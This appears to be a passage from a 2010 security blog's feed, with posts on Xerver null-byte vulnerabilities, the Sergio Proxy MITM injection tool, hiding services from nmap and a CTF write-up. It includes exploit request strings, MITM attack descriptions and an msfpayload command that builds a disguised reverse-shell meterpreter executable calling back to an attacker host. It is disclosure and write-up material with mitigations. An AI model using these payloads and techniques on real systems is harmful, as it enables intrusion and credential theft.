byte injection vulnerability to trick Xerver into coughing up any
accessible files in plain text. The trick relies on Java's handling of
strings. When looking up the mime-type of the file, Xerver uses Java's
find function to search for the last &amp;quot;.&amp;quot; in the requested document
string and pull out the file extension. If a null byte is injected in
our string, Java (unlike C) treats it as any other character; it's
simply a byte to be checked. However, when Java goes to open and read
the file, it has to make an external API call which uses (you guessed
it) C strings. This causes our original file to be read, but handled as
the mime-type of our choosing.
|  `` GET /admin.phpx00.txt HTTP/1.1``
|  The Xerver source indicates that at least some measures were taken to
prevent this (%00 is interpreted as the end of the string), it does not
take into account that a malicious client could simply inject a null
byte directly into the string. To fix this, Xerver should obviously be
checking for and removing null bytes from input.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="filetype-restriction-bypass"&gt;
&lt;h3&gt;Filetype Restriction Bypass&lt;/h3&gt;
&lt;p&gt;This vulnerability works exactly the same as the source disclosure, only
the goal is to bypass restrictions on what filetypes are allowed to be
served. By default, Xerver will serve you anything you request. However,
you can explicitly set certain files, like &amp;quot;.exe&amp;quot; files, to not be
accessible. If, for instance, someone configured Xerver to disallow exe
files but not bat files, we could still send GET /test.exe0x00.bat (with
the 0x00 encoded obviously), and Xerver would happily let us execute our
command anyway, for the same reason it would serve us PHP files as text.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="minor-directory-transversal-issue"&gt;
&lt;h3&gt;Minor Directory Transversal Issue&lt;/h3&gt;
&lt;p&gt;This problem was very strongly protected against (especially compared to
the rest of the issues) because another researcher found this particular
bug in an earlier version, and a decent patch was made. That being said,
I was still able to list a directory above the root directory using the
same null character injection technique used on the previous two bugs.
This works because Xerver searches the string to find any occurrences of
/../ , but if a null byte is injected between the .. and / it won't be
detected, and the directory immediately above the root directory will be
listed if directory listing is enabled.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="remote-code-execution"&gt;
&lt;h2&gt;Remote Code Execution&lt;/h2&gt;
&lt;p&gt;With these bugs (and the ones discovered by previous researchers) it is
possible to get remote code execution on many Xerver installations. I
have written a Metasploit module that can execute code on these systems;
however I am delaying a bit before releasing it to a.) possibly
polish/refine the attack more and b.) to give users time to fix their
installations. To prevent code execution, do NOT share your root
directory, do not make the administrative panel remotely accessible, and
do not allow execution of exe or bat files. My patch will not solve this
issue, as it is configuration specific.&lt;/p&gt;
&lt;/div&gt;
</summary></entry><entry><title>High Gain Wifi Antenna for Under $10</title><link href="https://spareclockcycles.org/2010/06/10/high-gain-wifi-antenna-for-under-10.html" rel="alternate"></link><updated>2010-06-10T21:03:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-06-10:2010/06/10/high-gain-wifi-antenna-for-under-10.html</id><summary type="html">&lt;p&gt;Sorry, no proxy fun quite yet. All in due time. I wanted to let everyone
know about &lt;a class="reference external" href="http://cirictech.com/?p=287"&gt;an interesting post&lt;/a&gt; that my friend Ciric over at
&lt;a class="reference external" href="http://cirictech.com/"&gt;cirictech.com&lt;/a&gt; just put up documenting how he went about building a
wifi antenna for me back during finals week. He made it out of a piece
of wood, a coat hanger, some coax, and an SMA connector. Very cheap, but
surprisingly effective. In out tests, the antenna gave us very good
gain, giving strong signals to access points from half a mile away. It's
worth a look if you're in the market for a wifi antenna, or if you go
wardriving on a regular basis.&lt;/p&gt;
</summary></entry><entry><title>Code And Such</title><link href="https://spareclockcycles.org/2010/06/10/code-and-such.html" rel="alternate"></link><updated>2010-06-10T17:36:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-06-10:2010/06/10/code-and-such.html</id><summary type="html">&lt;p&gt;&lt;strong&gt;Released and Under Active Development&lt;/strong&gt;&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;a class="reference external" href="https://spareclockcycles.org/2010/04/25/updated-reverse-dns-tool/"&gt;Fast Reverse DNS Lookups using Python&lt;/a&gt; (code &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/revdns/revdns_cur.tar.gz"&gt;here&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="https://spareclockcycles.org/2010/05/14/hiding-services-from-nmap/"&gt;Alternate Port Finder&lt;/a&gt; (code
&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/find-ports.tar.gz"&gt;here&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="https://spareclockcycles.org/2011/07/10/sergio-proxy-v0-2-released/"&gt;Sergio Proxy (a Super Effective Regexer of Gathered Inputs and
Outputs)&lt;/a&gt; (code &lt;a class="reference external" href="http://code.google.com/p/sergio-proxy/"&gt;here&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="https://spareclockcycles.org/2010/12/19/d0z-me-the-evil-url-shortener/"&gt;d0z.me: The Evil URL Shortener&lt;/a&gt; (code
&lt;a class="reference external" href="http://code.google.com/p/d0z-me/"&gt;here&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="https://spareclockcycles.org/2011/09/18/exploitring-the-wordpress-extension-repos/"&gt;wpfinger: An advanced Wordpress plugin fingerprinter&lt;/a&gt;&amp;nbsp;(code
&lt;a class="reference external" href="http://code.google.com/p/wpfinger/"&gt;here&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;
</summary></entry><entry><title>Sergio Proxy - Injecting, Modifying, and Blocking HTTP Traffic</title><link href="https://spareclockcycles.org/2010/06/10/sergio-proxy-released.html" rel="alternate"></link><updated>2010-06-10T17:25:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-06-10:2010/06/10/sergio-proxy-released.html</id><summary type="html">&lt;p&gt;Edit: You can grab new releases of this tool
here:&amp;nbsp;&lt;a class="reference external" href="https://code.google.com/p/sergio-proxy/downloads/list"&gt;https://code.google.com/p/sergio-proxy/downloads/list&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I've gotten all settled in my new place (finally), so I figured I should
get caught up on my blog again. Lots of posts coming soon, I promise!&lt;/p&gt;
&lt;p&gt;Today, I'm releasing a tool that I'll be working on (and with) a lot
this summer that I'm calling Sergio Proxy: a Super Effective Regexer of
Gathered Inputs and Outputs (download &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/sergio_proxy_v0.1.tar.gz"&gt;here&lt;/a&gt;). Yeah, yeah, I know:
there are a billion other HTTP proxies out there that are way better
than mine and I should use. I know all about them; I just wanted to make
one myself. It's an interesting project, and I've learned a lot about
HTTP proxies and the &lt;a class="reference external" href="http://twistedmatrix.com/trac/"&gt;Twisted networking framework&lt;/a&gt; in the process. In
addition, this tool has made it *much* easier for me to use Python to
work with data captured from MITM'd HTTP connections than the other
tools that I experimented with. I also blindly stumbled into an awesome
topic for my next post too, to be released in the next few days (I'm
particularly excited for this one). A big fat warning before we go on
though: this is a very alpha release, so don't have your hopes way up.
It still has a long way to go (like adding HTTPS support...:P).&lt;/p&gt;
&lt;p&gt;So why did I originally start on this project? Mainly because &lt;a class="reference external" href="http://www.irongeek.com/i.php?page=security/ettercapfilter"&gt;Ettercap
filters suck&lt;/a&gt;. I mean, really suck. Now, don't get me wrong, they can
be useful in some situations, but automatically injecting data into HTTP
sessions is not one of them. &amp;nbsp;So why did I need Ettercap filters to
inject data into HTTP sessions? Why, to attack SMB servers by means of
challenge-hash cracking of course.&lt;/p&gt;
&lt;p&gt;The attack works by injecting specially crafted HTML into a page that
the victim is requesting that references a file located on a local samba
server. &amp;nbsp;The browser will then automatically try to authenticate with
the remote server using its current user's credentials, exposing
challenge hashes of the user's password on the wire, the first 7
characters of which can then be cracked with rainbow tables. &amp;nbsp;To do
this, we obviously need to first be in a position where we can modify
the network traffic, which we can easily do using various methods (the
most popular probably being &lt;a class="reference external" href="http://en.wikipedia.org/wiki/ARP_spoofing"&gt;ARP poisoning&lt;/a&gt;, but Ettercap has a number
to chose from). However, once we have our MITM attack working, we are
still presented with the problem of injecting our content into the HTML
file.&lt;/p&gt;
&lt;p&gt;In all the &lt;a class="reference external" href="http://hackarandas.com/blog/2010/01/28/ettercap-metasploit-helping-the-aurora-attack/"&gt;examples&lt;/a&gt; I have seen, the attack used Ettercap filters to
do this injection, or an email with embedded HTML. Unfortunately,
neither is very unreliable. &amp;nbsp;All the filters that I tried seemed to
corrupt the pages in the best case. In the worst case, it even prevented
the victim from accessing certain servers, as the attack would try to
kill gzip support on servers that required it. Obviously, this kind of
degradation would be noticed even by the common computer user. As for
the email, you still generally need to trick the user into viewing it
before the attack will work. Not incredibly hard, but slower and still
less reliable than a forced HTML injection.&lt;/p&gt;
&lt;p&gt;After looking through some Wireshark captures, it seemed that the root
problem in the Ettercap method was that the HTTP content length wasn't
being modified, confusing the browser when it got more &amp;nbsp;data than it was
expecting. While it was probably possible to work around that in a
similar manner as the gzip compression was broken, it wouldn't solve the
heart of the problem: that trying to modify HTTP traffic at the TCP
level is neither effective nor powerful.&lt;/p&gt;
&lt;p&gt;Enter Sergio. It was obvious that what I was looking for was a forced,
transparent HTTP proxy. I looked at some other proxies, and I probably
could have adapted them to my purposes pretty easily. However, I decided
I would rather code one myself, and get familiar with the inner workings
of these tools, and to let me do everything in Python. I also have had
my eye on the Twisted framework for awhile, and figured that this would
be the perfect opportunity to familiarize myself with it.&lt;/p&gt;
&lt;p&gt;To run this attack, all you need to do is run the included
start_smbchall.py file. However, Sergio isn't just limited to evoking
SMB authentication attempts of course. Sergio can inject, modify, and
delete any content going through a victim's HTTP sessions, meaning that
we can do much, much more with it than just this attack. In addition to
this SMB fun, just for kicks, I also implemented my version of the
classic Upsidedownternet :P . Beyond these implemented attacks, Sergio
makes it easy to insert some malicious Javascript, &amp;nbsp;replace all the
links on the page with links to a malicious site, prevent the victim
from accessing any update sites, redirect them to malicious update sites
(more on this later), monitor/record all the traffic going over the
connection, or (a fun one) replace any exe file being downloaded with
our own, backdoored, malicious executable. Unfortunately, I haven't
gotten a chance to actually implement these attacks yet (lame), but I'll
have a release soon enough with them included.&lt;/p&gt;
&lt;p&gt;Anyway, now that you know the capabilities, here's how to use it. I
promise, it's easy. You'll only need two files, start_proxy.py and
UserMITM.py, and the module sergio_proxy installed somewhere in your
PYTHONPATH (when in doubt, just throw it in a subdirectory named
sergio_proxy). Example start_proxy and UserMITM files are included in
the tarball in the examples folder. Basically, you just create a
subclass of the included MITM class in UserMITM and add your own attacks
into it. Then, when creating and starting your transparent proxy, you
set UserMITM as transparent_proxy's new MITM instance, and you're ready
to go. Pretty straightforward.&lt;/p&gt;
&lt;p&gt;If you want to know more about what my proxy does and does not do, read
the README. Here's the short of it though: does HTTP 1.0, does not do
1.1 (yet), does not MITM HTTPS (yet). Sorry if this is disappointing,
but they weren't critical to my initial attack, and I will of course get
these things fixed ASAP.&lt;/p&gt;
&lt;p&gt;So that's Sergio Proxy. I could talk more, but it's probably easier for
you to just download it and mess around. And please, if you implement
some attacks with it, submit them! I'd be happy to add them in. As I
mentioned earlier, I should be back in a few days will an interesting
application of my tool. Until then, keep hacking.&lt;/p&gt;
</summary><category term="arp"></category><category term="ettercap"></category><category term="halflmchall"></category><category term="http"></category><category term="mitm"></category><category term="sergio"></category><category term="smb"></category></entry><entry><title>Hiding Services from Nmap Using Non-Standard Ports</title><link href="https://spareclockcycles.org/2010/05/14/hiding-services-from-nmap.html" rel="alternate"></link><updated>2010-05-14T21:28:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-05-14:2010/05/14/hiding-services-from-nmap.html</id><summary type="html">&lt;p&gt;Most system administrators know that using non-standard ports for some
services can be a useful way to hide ports from both automated attacks
and less determined attackers. In addition, it is also a good way to
lower the profile of an important host on your network, as an initial
portscan of what is actually an important host might report nothing
particularly attractive to an attacker if the services are using
non-standard ports. But how should one go about choosing a non-standard
port to use? Is one better than another?&lt;/p&gt;
&lt;p&gt;As some may know, &lt;a class="reference external" href="http://nmap.org/"&gt;nmap&lt;/a&gt;, which is easily the most popular port
scanning tool out there, will by default not scan all the ports on a
system, as this is *very* slow and *very* noisy. Instead, nmap uses
statistics gathered by the nmap developers to determine which ports will
most likely be open on any given host, thereby greatly increasing the
likelihood that a scan of 1000 ports will yield all the open ports on a
system. While this is great for increasing scan speed and decreasing
visibility, it brings with it a downside: that individuals wishing to
hide ports can more easily hide from port scans if they wish to.&lt;/p&gt;
&lt;p&gt;The statistics that nmap uses to determine common services are stored in
an included &amp;quot;nmap-services&amp;quot; file. I have written a small script
(&lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/find-ports.tar.gz"&gt;available here&lt;/a&gt;) that parses this file and provides a list of ports
in a provided range that are not included in the file. Any of these
ports will, therefore, not be revealed to an attacker unless they
already know the port number from some other research that they did on
the host, or if they waste the time and take the risk of performing a
full scan of all 65536 ports.&lt;/p&gt;
&lt;p&gt;As an example, I started with a host that had port 80 (http) open and
port 22 (ssh) open. This host, to an attacker performing a port scan of
a network, could look rather tempting. Both ssh servers and http servers
are interesting services, and could attract unwanted attention. In
addition, these servers (especially ssh) are magnets for brute force
attacks, filling up logs with tons of uninteresting garbage, making it
hard to track the actually important information. Here is a screen shot
of our example host:&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/05/before-changing-ports.png"&gt;&lt;img alt="Oh look! A target!" src="https://spareclockcycles.org/wp-content/uploads/2010/05/before-changing-ports-300x175.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Using my tool, we can find other ports for these services to use that
nmap won't easily find. I chose 242 for ssh and 8079 for http-alt, but
it's arbitrary.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/05/looking-for-new-ssh-port.png"&gt;&lt;img alt="So many to chose from!" src="https://spareclockcycles.org/wp-content/uploads/2010/05/looking-for-new-ssh-port-300x168.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/05/looking-for-new-httpalt-port.png"&gt;&lt;img alt="So many to chose from...again!" src="https://spareclockcycles.org/wp-content/uploads/2010/05/looking-for-new-httpalt-port-300x168.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Ok, so now we just edit the configuration file for the respective
services, restart them, and voila, we are invisible! Well, you know,
almost.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/05/after-ports-changed-standard.png"&gt;&lt;img alt="You can't see me! :P" src="https://spareclockcycles.org/wp-content/uploads/2010/05/after-ports-changed-standard-300x168.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/05/after-port-change-more-thorough.png"&gt;&lt;img alt="You still can't see me! :P" src="https://spareclockcycles.org/wp-content/uploads/2010/05/after-port-change-more-thorough-300x168.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://spareclockcycles.org/wp-content/uploads/2010/05/after-port-change-complete.png"&gt;&lt;img alt="You can see me...with enough time." src="https://spareclockcycles.org/wp-content/uploads/2010/05/after-port-change-complete-300x168.png" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;As you can see, an attacker will be forced to perform an exhaustive scan
of the system to gain any useful information. Our two ports, 242 and
8079, only show up when we force nmap to scan every port on the system,
which is definitely not fast or quiet, and many IDS systems will detect
&amp;nbsp;this complete scan.&lt;/p&gt;
&lt;p&gt;Now, obviously, this is not the solution to all your security problems.
If you have an outward facing HTTP server, people need to know the port
to access it, so no matter what port it's on an attacker &amp;nbsp;will be able
to find it. However, if &amp;nbsp;your service has a very limited amount of
people that need to know the port number, but that is also a very
important service that will attract attacks (like ssh or http), then
using a non-standard port could make sense, and using this method will
make your important services basically invisible to all but the most
determined attackers.&lt;/p&gt;
&lt;p&gt;As always, any bugfixes or suggestions are definitely welcome. Enjoy!&lt;/p&gt;
</summary><category term="hacking"></category><category term="nmap"></category><category term="nonstandard ports"></category><category term="port scanning"></category><category term="system administration"></category></entry><entry><title>Offensive Security's HSIYF Competition Results Released</title><link href="https://spareclockcycles.org/2010/05/12/offensive-securitys-hsiyf-competition-results-released.html" rel="alternate"></link><updated>2010-05-12T17:33:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-05-12:2010/05/12/offensive-securitys-hsiyf-competition-results-released.html</id><summary type="html">&lt;p&gt;The &lt;a class="reference external" href="http://www.information-security-training.com/news/hsiyf-1-tournament-results/"&gt;final contest results&lt;/a&gt; were announced today, so I have opened up
&lt;a class="reference external" href="https://spareclockcycles.org/2010/05/10/how-i-beat-the-offensive-security-challenge/"&gt;my documentation of the event&lt;/a&gt; for all to read. Congrats to Vadium
(&lt;a class="reference external" href="http://www.information-security-training.com/documentation/04-vadium.pdf"&gt;docs&lt;/a&gt;) and Woff
(&lt;a class="reference external" href="http://www.information-security-training.com/documentation/06-woff.pdf"&gt;docs&lt;/a&gt;),
you guys definitely deserved it!&lt;/p&gt;
&lt;p&gt;I was a little disappointed with my results personally, but 24th out of
~1000 isn't bad I guess for losing a day plus some to moving, as well as
not being as focused on it as I should have been. Hopefully the next one
will be scheduled when I don't have hack and pack up half my worldly
possessions up at the same time :P .&lt;/p&gt;
</summary><category term="contest"></category><category term="offensive security"></category><category term="Pen Testing"></category></entry><entry><title>Offsec Challenge Post Password Protected</title><link href="https://spareclockcycles.org/2010/05/11/offsec-challenge-post-password-protected.html" rel="alternate"></link><updated>2010-05-11T01:21:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-05-11:2010/05/11/offsec-challenge-post-password-protected.html</id><summary type="html">&lt;p&gt;Hi all,&lt;/p&gt;
&lt;p&gt;Just wanted to let everyone know that although I have posted my
challenge report, it will be password protected from now until the
judging of the entires has been completed. This is simply to protect
myself from having my solutions stolen, although I would hope that no
one would need to do this. I will post an update when the final results
come in, and release the challenge report from password protection.&lt;/p&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Until then,&lt;/div&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;supernothing&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;EDIT 05/14/10: The &lt;a class="reference external" href="https://spareclockcycles.org/2010/05/12/offensive-securitys-hsiyf-competition-results-released/"&gt;results are in&lt;/a&gt;, and I have opened up &lt;a class="reference external" href="https://spareclockcycles.org/2010/05/10/how-i-beat-the-offensive-security-challenge/"&gt;my
documentation&lt;/a&gt; for all to read. Enjoy!&lt;/p&gt;
</summary><category term="contest"></category><category term="offensive security"></category><category term="Pen Testing"></category></entry><entry><title>How I Beat the Offensive Security Challenge</title><link href="https://spareclockcycles.org/2010/05/10/how-i-beat-the-offensive-security-challenge.html" rel="alternate"></link><updated>2010-05-10T16:59:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-05-10:2010/05/10/how-i-beat-the-offensive-security-challenge.html</id><summary type="html">&lt;p&gt;This weekend, &lt;a class="reference external" href="http://www.offensive-security.com"&gt;Offensive Security&lt;/a&gt; held a hacking competition (CTF
style), so of course I felt obliged to participate. After all, I
couldn't pass up an opportunity to get some good old fashioned hacking
in. So, I `svn update`d my trusty old Metasploit copy, grabbed a
significant quantity of alcoholic and caffeinated beverages, and got to
work.&lt;/p&gt;
&lt;p&gt;For those not familiar with the contest rules (which is basically anyone
who decided not to waste their first weekend of summer on their
computer), there were three machines that contestants were supposed to
analyze and compromise: the aptly named &amp;quot;n00bfilter&amp;quot;, &amp;quot;killthen00b&amp;quot;, and
&amp;quot;gh0st&amp;quot;. The following blog post documents the process I went through to
compromise all three systems, and what could have been done to prevent
these attacks by concerned system administrators. My apologies for the
length: it was a lot of work, so I have a lot to write about. My code
and screenshots of everything I did on killthen00b and gh0st can be
found &lt;a class="reference external" href="https://spareclockcycles.org/offsec-challenge.tar.gz"&gt;here&lt;/a&gt;. I would have had screens for the n00bfilter attack as
well, but the ops brought the servers down early. Oh well.&lt;/p&gt;
&lt;p&gt;Before I begin, I would like to give props to people who helped: my
girlfriend, for not killing me this weekend, my good friends
&lt;a class="reference external" href="http://duststorm.org"&gt;duststorm&lt;/a&gt; and &lt;a class="reference external" href="http://cirictech.com"&gt;ciric&lt;/a&gt; for letting me bounce ideas off them and for
forcing me to take breaks to eat, and all the mods of the event, for
putting up with my very consistent and annoying whining. You were just
as crucial to my success as my puny brain and the exploits themselves.
So yeah, thanks!&lt;/p&gt;
&lt;p&gt;Also, to everyone who participated with me in it, way to go. It was
awesome hacking with you guys. Always happy to meet smart people. Hope
to see you around soon!&lt;/p&gt;
&lt;p&gt;So now, with my thank yous out of the way, we can get to the good
stuff...&lt;/p&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;For all my exploits, the following tools were used:&lt;/div&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;Nmap, Metasploit, Google, Python, Tamper Data, and my brain.&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="the-n00bfilter"&gt;
&lt;h2&gt;The N00bfilter&lt;/h2&gt;
&lt;div class="section" id="how-i-exploited-it"&gt;
&lt;h3&gt;How I Exploited It&lt;/h3&gt;
&lt;p&gt;This machine, though quite easy to hack, took me the longest out of all
of them. Why? Because, unfortunately, many others couldn't pass up the
opportunity to hack stuff either I guess. And there were apparently a
lot of noobs in that group. But more on that later.&lt;/p&gt;
&lt;p&gt;I woke up around 9 CST, which was when the contest was scheduled to
begin. I got my confirmation email, and got to work. First, I nmap'd the
box (slowly, so as to not trip the IDS), and determined that ports 22
and 80 were open. Bringing up the page, I was greeted with a simple
login screen. Reading the source of this page gave nothing obvious away.
After doing this, I of course sent the string &amp;quot;';-- just to see if maybe
my job might simply be that easy. Of course, it wasn't. I was greeted
with a mocking &amp;quot;HAHAHA!&amp;quot; message. After this, I tried &amp;quot;admin:admin&amp;quot; as a
login, and was told that I was a lazy illegitimate child and that I
should get back to work.&lt;/p&gt;
&lt;p&gt;WARNING: It's at this part of the story that I start getting annoyed.
Having recently switched to Chrome, I assumed that its view source
function would work identically to Firefox's: it would simply display
the exact source that it had used to render the page. How wrong I
was...for god knows what reason, Chrome actually reloads the page
(without preserving POST params) and displays that instead. Well, I
definitely noticed that it was a different page (it was exactly the same
as the &amp;quot;admin:admin&amp;quot; result page), but I lazily tacked looking up the
true source in Firefox on the end of my TODO list rather than opening it
up then, which cost me a good hour of my time flailing around, getting
basically nothing.&lt;/p&gt;
&lt;p&gt;Once I finally got back to looking at this page, it was 11 o'clock. I
found that the page's source structure was significantly different from
the normal failed login page, and that it seemed to have been generated
by some sort of web firewall made by Applicure called dotDefender. With
some quick google-fu, I found a very recent vulnerability in their
software that allows for remote system command execution for authorized
users. So in other words: get a login, get code execution.&lt;/p&gt;
&lt;p&gt;By this time however, the servers started getting pounded. And I know
muts, you could &amp;quot;access them fine&amp;quot;. But seriously, unless you guys had
banned the IPs of all my computers and my proxies for 8 hours straight,
there was some serious DoSing going down. In addition, people kept
changing the admin password to the application (which, by default, was
&amp;quot;password&amp;quot;), so every time I actually got the page to load, before I
could even get around to using my exploit, I'd get prompted for a
password, or the connection would die again. It literally took me a good
8 hours of watching loading bars before the load finally lightened up
enough that I got in, used the Tamper Data Firefox plugin to mess with
the POST parameters of a delete operation (as per the exploit) like I
had been planning since 11AM, and executed &amp;quot;find / -name n00bsecret.txt&amp;quot;
and &amp;quot;cat /opt/reallylongpaththatidontremember/n00bsecret.txt&amp;quot; to advance
to the next round.&lt;/p&gt;
&lt;p&gt;I know it's not your fault Offsec guys, I'm positive it was just a
combination of high load and stupid noobs pounding your IDS with
automated tools. It was just frustrating to have an exploit that I knew
exactly how to use, and not be able to. Maybe you can just get more
servers next time :D .&lt;/p&gt;
&lt;p&gt;UPDATE 05/12/10: The Offsec guys have just &lt;a class="reference external" href="http://www.information-security-training.com/news/offsec-hsiyf-report-part1/"&gt;posted a response&lt;/a&gt; to some
of the issues I raised here on their blog. The password was apparently
not necessary, as there was also a &lt;a class="reference external" href="http://www.information-security-training.com/documentation/dotdefender.js.txt"&gt;0-day XSS attack to be discovered&lt;/a&gt;
which, combined with the previous exploit, allowed for unauthenticated
exploitation. My bad on that one for not exploring it in more depth,
thank you for the explanation. As for not being able to simply access
the servers though, the explanation that everyone having these issues
must have been tripping the IDS simply does not hold water in my book,
but I guess arguing about it at this point is wasted breath.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="how-to-mitigate-the-risk"&gt;
&lt;h3&gt;How To Mitigate The Risk&lt;/h3&gt;
&lt;p&gt;This one was quite a serious vulnerability (remote code execution), but
would be pretty straightforward to prevent.&lt;/p&gt;
&lt;p&gt;For system administrators: update your software (especially security
software), and don't use easy to guess passwords like &amp;quot;password&amp;quot;. In
addition, try and make any error pages that are returned from software
similar to dotDefender look as similar as possible (if not identical) to
a normal failed login page, so that an unskilled attacker might not be
able to tell that it was an external application that blocked their
request. That measure alone would have made this vulnerability
significantly more difficult to find, as the error page would be less
noticeable.&lt;/p&gt;
&lt;p&gt;For those developing applications like dotDefender: don't put your
software name or even company name in the response. It's not helping you
advertise, I promise you, and it makes it easier for attackers to
identify your software. And as we all know, this is the first step to
exploitation. If you make the attackers' jobs easier, it will probably
hurt your reputation in the long run. Sysadmins, if it is possible for
you to disable these sort of things, be sure to do so.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="killthen00b"&gt;
&lt;h2&gt;Killthen00b&lt;/h2&gt;
&lt;div class="section" id="id1"&gt;
&lt;h3&gt;How I Exploited It&lt;/h3&gt;
&lt;p&gt;After finally getting through the giant, for lack of a better word,
clusterf*ck that was the n00bfilter, the going was much easier.&lt;/p&gt;
&lt;p&gt;I spent most of Saturday evening getting familiar with &lt;a class="reference external" href="http://netwinsite.com/surgemail/"&gt;Surgemail&lt;/a&gt;,
which was installed on the remote host to provide email services.
Initially, my plan was to find a way to get a user and password added
(or guess an existing one), and then use this to execute one of the
authenticated user remote exploits (&lt;a class="reference external" href="http://www.offensive-security.com/msf/surgemail_list.rb"&gt;there&lt;/a&gt; &lt;a class="reference external" href="http://aluigi.altervista.org/adv/surgemailz-adv.txt"&gt;were&lt;/a&gt; &lt;a class="reference external" href="http://www.milw0rm.com/exploits/5259"&gt;multiple&lt;/a&gt;) for
the installed version of Surgemail.&lt;/p&gt;
&lt;p&gt;However, this proved more difficult than I originally thought, as all
sign-up functions that I could find were disabled, no accounts had
account-recovery questions enabled, and users were not allowed to use
email accounts on different domains. This was a good move on the part of
the theoretical sysadmins. If any of these had been enabled, it would
have been simple to exploit the server using my method. However, after
two or three hours of probing through Surgemail docs, my own installed
Surgemail test setup in my VM, and looking through the remote install, I
couldn't find any obvious other way to get a valid user on the server
short of attempting a bruteforce. I decided to let it sit for awhile and
go hang out with some friends, and then sleep on it.&lt;/p&gt;
&lt;p&gt;I woke up the next morning refreshed and ready, and within the hour was
well on my way to System privileges. At the beginning of the
competition, we were given FTP credentials for this server. I had only
checked briefly to make sure they worked when I first nmap'd the server
and saw the FTP port, instead focusing on my Surgemail approach. I
decided to probe a little more into the FTP setup, and quickly found
that it had been mis-configured to allow access to and modification of
the entire filesystem. WIN.&lt;/p&gt;
&lt;p&gt;After this, my thorough exploration of the Surgemail system came in
handy, as I remembered noticing that any executable in the /scripts/
directory would automatically be executed upon access, no questions
asked. I had previously hoped that I could get it to execute programs
outside the /scripts/ directory, but now that I could put things into
that directory instead, I didn't need to climb that mountain. For fun, I
decided to try out Metasploit's fancy new reverse_tcp_dns meterpreter
module, and used the following command to generate my exploit:&lt;/p&gt;
&lt;p&gt;&lt;tt class="docutils literal"&gt;./msfpayload windows/meterpreter/reverse_tcp_dns LHOST=192.168.6.170 LPORT=7777 R | ./msfencode &lt;span class="pre"&gt;-t&lt;/span&gt; exe &lt;span class="pre"&gt;-e&lt;/span&gt; x86/shikata_ga_nai &lt;span class="pre"&gt;-o&lt;/span&gt; svchost.exe&lt;/tt&gt;&lt;/p&gt;
&lt;p&gt;I didn't feel like restarting my msfconsole as root (as it takes forever
to load on my netbook), so I didn't use port 53, but had there been any
issue with IDS/IPS, this could probably have bypassed it with this. I
uploaded my malicious executable, browsed to
&lt;a class="reference external" href="http://192.168.6.70/scripts/svchost.exe"&gt;http://192.168.6.70/scripts/svchost.exe&lt;/a&gt;, and BAM, instant system
privileges. A quick search through the C:\Users\Administrator\Desktop
revealed the file I needed to get credit.&lt;/p&gt;
&lt;p&gt;EDIT 05/12/10: Well, after reading Vadium's excellent documentation, it
turns out that it was not a mis-configured IIS FTP server, but instead
&amp;quot;Complete Ftp Server 3.3.0&amp;quot; which has a directory transversal
vulnerability that I inadvertently rediscovered by trying to cd to C:/.
Not sure if I should feel smart or stupid about that...&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="id2"&gt;
&lt;h3&gt;How To Mitigate The Risk&lt;/h3&gt;
&lt;p&gt;Most obviously, &amp;quot;devil&amp;quot; should have been more careful with his/her
password. Protecting users from social engineering attacks through
eduction and good spam filtering is key for preventing these kinds of
leaks, as well as strict password policy enforcement to prevent brute
force attacks.&lt;/p&gt;
&lt;p&gt;Beyond this, the configuration of FTP permissions was absolutely
unforgivable. It allowed an attacker that normally wouldn't have even
gotten code execution to quickly get a remote system-level shell.
Administrators, lock down the permissions for any services that allow
user logins, so as to prevent a total compromise in the case of a single
user's account being broken into.&lt;/p&gt;
&lt;p&gt;As for the webmail server itself: it a.) should not have been running as
System unless absolutely necessary (which, I believe, it isn't in Server
2008...although Surgemail may possibly be a legacy program and need it)
and b.) should have been much, much more careful about how it handles
